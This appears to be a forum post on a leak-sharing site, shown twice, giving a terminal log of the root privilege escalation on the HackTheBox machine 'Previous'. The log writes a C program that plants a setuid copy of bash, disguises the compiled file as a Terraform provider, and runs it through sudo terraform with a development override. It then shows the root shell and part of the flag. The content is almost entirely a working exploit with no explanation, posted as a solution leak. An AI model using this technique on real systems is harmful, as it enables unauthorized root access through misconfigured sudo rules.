HackTheBox Previous S8 Root.txt

By DefaltXploit in HackTheBox

Loading component...

HackTheBox Previous S8 Root.txt

By DefaltXploit in HackTheBox

You must be signed in to access this leak.Sign in

Loading component...

DefaltXploit
User
- Posts:4
- Topics:3
- Leaks:3
- Reputation:0
jeremy@previous:/tmp$ cat > pwn.c << 'EOF'
#include <unistd.h>
#include <stdlib.h>
int main() { setuid(0); setgid(0);
system("cp /bin/bash /tmp/bash; chmod +s /tmp/bash");
return 0;
}
EOF
jeremy@previous:/tmp$ ls pwn.c systemd-private-fa6ca75200734629bce1534bf0e3e1fb-ModemManager.service-koCxZM
systemd-private-fa6ca75200734629bce1534bf0e3e1fb-systemd-logind.
service-e6DwAJ
systemd-private-fa6ca75200734629bce1534bf0e3e1fb-systemd-resolve
d.service-3woNOr
systemd-private-fa6ca75200734629bce1534bf0e3e1fb-systemd-timesyn
cd.service-Jrv4h0
vmware-root_622-2689275054
jeremy@previous:/tmp$ gcc pwn.c -o /tmp/terraform-provider-examp
les
jeremy@previous:/tmp$ chmod +x terraform-provider-examples
jeremy@previous:/tmp$ cd /opt/examples/
jeremy@previous:/opt/examples$ sudo /usr/bin/terraform -chdir=/o
pt/examples apply
╷ │ Warning: Provider development overrides are in effect │ │ The following provider development overrides are set in the │ CLI configuration:
│ - previous.htb/terraform/examples in /tmp
│
│ The behavior may therefore not match any released version of
│ the provider and applying changes may cause the state to │ become incompatible with published releases. ╵ ╷ │ Error: Failed to load plugin schemas │
│ Error while loading schemas for plugin components: Failed to
│ obtain provider schema: Could not load the schema for │ provider previous.htb/terraform/examples: failed to │ instantiate provider "previous.htb/terraform/examples" to
│ obtain schema: Unrecognized remote plugin message: │ Failed to read any lines from plugin's stdout │ This usually means
│ the plugin was not compiled for this architecture,
│ the plugin is missing dynamic-link libraries necessary to ru
n,
│ the plugin is not executable by this process due to file permissions, or
│ the plugin failed to negotiate the initial go-plugin protocol handshake
│
│ Additional notes about plugin:
│ Path: /tmp/terraform-provider-examples
│ Mode: -rwxrwxr-x
│ Owner: 1000 [jeremy] (current: 0 [root])
│ Group: 1000 [jeremy] (current: 0 [root])
│ ELF architecture: EM_X86_64 (current architecture: amd64)
│ ..
╵
jeremy@previous:/opt/examples$ cd /tmp
jeremy@previous:/tmp$ ls -la
total 1432
drwxrwxrwt 12 root root 4096 Sep 5 04:21 .
drwxr-xr-x 18 root root 4096 Aug 21 20:23 ..
-rwsr-sr-x 1 root root 1396520 Sep 5 04:21 bash
drwxrwxrwt 2 root root 4096 Sep 5 04:00 .font-unix
drwxrwxrwt 2 root root 4096 Sep 5 04:00 .ICE-unix
-rw-rw-r-- 1 jeremy jeremy 158 Sep 5 04:19 pwn.c
drwx------ 3 root root 4096 Sep 5 04:00 systemd-private-fa6ca75200734629bce1534bf0e3e1fb-ModemManager.service-koCxZM
drwx------ 3 root root 4096 Sep 5 04:00 systemd-private-fa6ca75200734629bce1534bf0e3e1fb-systemd-logind.service-e6DwAJ
drwx------ 3 root root 4096 Sep 5 04:00 systemd-private-fa6ca75200734
629bce1534bf0e3e1fb-systemd-resolved.service-3woNOr
drwx------ 3 root root 4096 Sep 5 04:00 systemd-private-fa6ca75200734629bce1534bf0e3e1fb-systemd-timesyncd.service-Jrv4h0
-rwxrwxr-x 1 jeremy jeremy 16048 Sep 5 04:20 terraform-provider-examples
drwxrwxrwt 2 root root 4096 Sep 5 04:00 .Test-unix
drwx------ 2 root root 4096 Sep 5 04:01 vmware-root_622-2689275054
drwxrwxrwt 2 root root 4096 Sep 5 04:00 .X11-unix
drwxrwxrwt 2 root root 4096 Sep 5 04:00 .XIM-unix
jeremy@previous:/tmp$ /tmp/bash -p
bash-5.1# ud
bash: ud: command not found
bash-5.1# id
uid=1000(jeremy) gid=1000(jeremy) euid=0(root) egid=0(root) groups=0(root),100
0(jeremy) bash-5.1# whoami
root bash-5.1# ls -la
total 1432
drwxrwxrwt 12 root root 4096 Sep 5 04:21 .
drwxr-xr-x 18 root root 4096 Aug 21 20:23 ..
-rwsr-sr-x 1 root root 1396520 Sep 5 04:21 bash
drwxrwxrwt 2 root root 4096 Sep 5 04:00 .font-unix
drwxrwxrwt 2 root root 4096 Sep 5 04:00 .ICE-unix
-rw-rw-r-- 1 jeremy jeremy 158 Sep 5 04:19 pwn.c
drwx------ 3 root root 4096 Sep 5 04:00 systemd-private-fa6ca75200734
629bce1534bf0e3e1fb-ModemManager.service-koCxZM
drwx------ 3 root root 4096 Sep 5 04:00 systemd-private-fa6ca75200734
629bce1534bf0e3e1fb-systemd-logind.service-e6DwAJ
drwx------ 3 root root 4096 Sep 5 04:00 systemd-private-fa6ca75200734
629bce1534bf0e3e1fb-systemd-resolved.service-3woNOr
drwx------ 3 root root 4096 Sep 5 04:00 systemd-private-fa6ca75200734
629bce1534bf0e3e1fb-systemd-timesyncd.service-Jrv4h0
-rwxrwxr-x 1 jeremy jeremy 16048 Sep 5 04:20 terraform-provider-examples
drwxrwxrwt 2 root root 4096 Sep 5 04:00 .Test-unix
drwx------ 2 root root 4096 Sep 5 04:01 vmware-root_622-2689275054
drwxrwxrwt 2 root root 4096 Sep 5 04:00 .X11-unix
drwxrwxrwt 2 root root 4096 Sep 5 04:00 .XIM-unix
bash-5.1# ls /root
clean examples go root.txt
bash-5.1# cat /root/root.txt
a638a348060**********
05.09.2025, 04:34

Loading component...

HackTheBox Previous S8 Root.txt - BreachStars

DefaltXploit
User
- Posts:4
- Topics:3
- Leaks:3
- Reputation:0
jeremy@previous:/tmp$ cat > pwn.c << 'EOF'
#include <unistd.h>
#include <stdlib.h>
int main() { setuid(0); setgid(0);
system("cp /bin/bash /tmp/bash; chmod +s /tmp/bash");
return 0;
}
EOF
jeremy@previous:/tmp$ ls pwn.c systemd-private-fa6ca75200734629bce1534bf0e3e1fb-ModemManager.service-koCxZM
systemd-private-fa6ca75200734629bce1534bf0e3e1fb-systemd-logind.
service-e6DwAJ
systemd-private-fa6ca75200734629bce1534bf0e3e1fb-systemd-resolve
d.service-3woNOr
systemd-private-fa6ca75200734629bce1534bf0e3e1fb-systemd-timesyn
cd.service-Jrv4h0
vmware-root_622-2689275054
jeremy@previous:/tmp$ gcc pwn.c -o /tmp/terraform-provider-examp
les
jeremy@previous:/tmp$ chmod +x terraform-provider-examples
jeremy@previous:/tmp$ cd /opt/examples/
jeremy@previous:/opt/examples$ sudo /usr/bin/terraform -chdir=/o
pt/examples apply
╷ │ Warning: Provider development overrides are in effect │ │ The following provider development overrides are set in the │ CLI configuration:
│ - previous.htb/terraform/examples in /tmp
│
│ The behavior may therefore not match any released version of
│ the provider and applying changes may cause the state to │ become incompatible with published releases. ╵ ╷ │ Error: Failed to load plugin schemas │
│ Error while loading schemas for plugin components: Failed to
│ obtain provider schema: Could not load the schema for │ provider previous.htb/terraform/examples: failed to │ instantiate provider "previous.htb/terraform/examples" to
│ obtain schema: Unrecognized remote plugin message: │ Failed to read any lines from plugin's stdout │ This usually means
│ the plugin was not compiled for this architecture,
│ the plugin is missing dynamic-link libraries necessary to ru
n,
│ the plugin is not executable by this process due to file permissions, or
│ the plugin failed to negotiate the initial go-plugin protocol handshake
│
│ Additional notes about plugin:
│ Path: /tmp/terraform-provider-examples
│ Mode: -rwxrwxr-x
│ Owner: 1000 [jeremy] (current: 0 [root])
│ Group: 1000 [jeremy] (current: 0 [root])
│ ELF architecture: EM_X86_64 (current architecture: amd64)
│ ..
╵
jeremy@previous:/opt/examples$ cd /tmp
jeremy@previous:/tmp$ ls -la
total 1432
drwxrwxrwt 12 root root 4096 Sep 5 04:21 .
drwxr-xr-x 18 root root 4096 Aug 21 20:23 ..
-rwsr-sr-x 1 root root 1396520 Sep 5 04:21 bash
drwxrwxrwt 2 root root 4096 Sep 5 04:00 .font-unix
drwxrwxrwt 2 root root 4096 Sep 5 04:00 .ICE-unix
-rw-rw-r-- 1 jeremy jeremy 158 Sep 5 04:19 pwn.c
drwx------ 3 root root 4096 Sep 5 04:00 systemd-private-fa6ca75200734629bce1534bf0e3e1fb-ModemManager.service-koCxZM
drwx------ 3 root root 4096 Sep 5 04:00 systemd-private-fa6ca75200734629bce1534bf0e3e1fb-systemd-logind.service-e6DwAJ
drwx------ 3 root root 4096 Sep 5 04:00 systemd-private-fa6ca75200734
629bce1534bf0e3e1fb-systemd-resolved.service-3woNOr
drwx------ 3 root root 4096 Sep 5 04:00 systemd-private-fa6ca75200734629bce1534bf0e3e1fb-systemd-timesyncd.service-Jrv4h0
-rwxrwxr-x 1 jeremy jeremy 16048 Sep 5 04:20 terraform-provider-examples
drwxrwxrwt 2 root root 4096 Sep 5 04:00 .Test-unix
drwx------ 2 root root 4096 Sep 5 04:01 vmware-root_622-2689275054
drwxrwxrwt 2 root root 4096 Sep 5 04:00 .X11-unix
drwxrwxrwt 2 root root 4096 Sep 5 04:00 .XIM-unix
jeremy@previous:/tmp$ /tmp/bash -p
bash-5.1# ud
bash: ud: command not found
bash-5.1# id
uid=1000(jeremy) gid=1000(jeremy) euid=0(root) egid=0(root) groups=0(root),100
0(jeremy) bash-5.1# whoami
root bash-5.1# ls -la
total 1432
drwxrwxrwt 12 root root 4096 Sep 5 04:21 .
drwxr-xr-x 18 root root 4096 Aug 21 20:23 ..
-rwsr-sr-x 1 root root 1396520 Sep 5 04:21 bash
drwxrwxrwt 2 root root 4096 Sep 5 04:00 .font-unix
drwxrwxrwt 2 root root 4096 Sep 5 04:00 .ICE-unix
-rw-rw-r-- 1 jeremy jeremy 158 Sep 5 04:19 pwn.c
drwx------ 3 root root 4096 Sep 5 04:00 systemd-private-fa6ca75200734
629bce1534bf0e3e1fb-ModemManager.service-koCxZM
drwx------ 3 root root 4096 Sep 5 04:00 systemd-private-fa6ca75200734
629bce1534bf0e3e1fb-systemd-logind.service-e6DwAJ
drwx------ 3 root root 4096 Sep 5 04:00 systemd-private-fa6ca75200734
629bce1534bf0e3e1fb-systemd-resolved.service-3woNOr
drwx------ 3 root root 4096 Sep 5 04:00 systemd-private-fa6ca75200734
629bce1534bf0e3e1fb-systemd-timesyncd.service-Jrv4h0
-rwxrwxr-x 1 jeremy jeremy 16048 Sep 5 04:20 terraform-provider-examples
drwxrwxrwt 2 root root 4096 Sep 5 04:00 .Test-unix
drwx------ 2 root root 4096 Sep 5 04:01 vmware-root_622-2689275054
drwxrwxrwt 2 root root 4096 Sep 5 04:00 .X11-unix
drwxrwxrwt 2 root root 4096 Sep 5 04:00 .XIM-unix
bash-5.1# ls /root
clean examples go root.txt
bash-5.1# cat /root/root.txt
a638a348060**********
05.09.2025, 04:34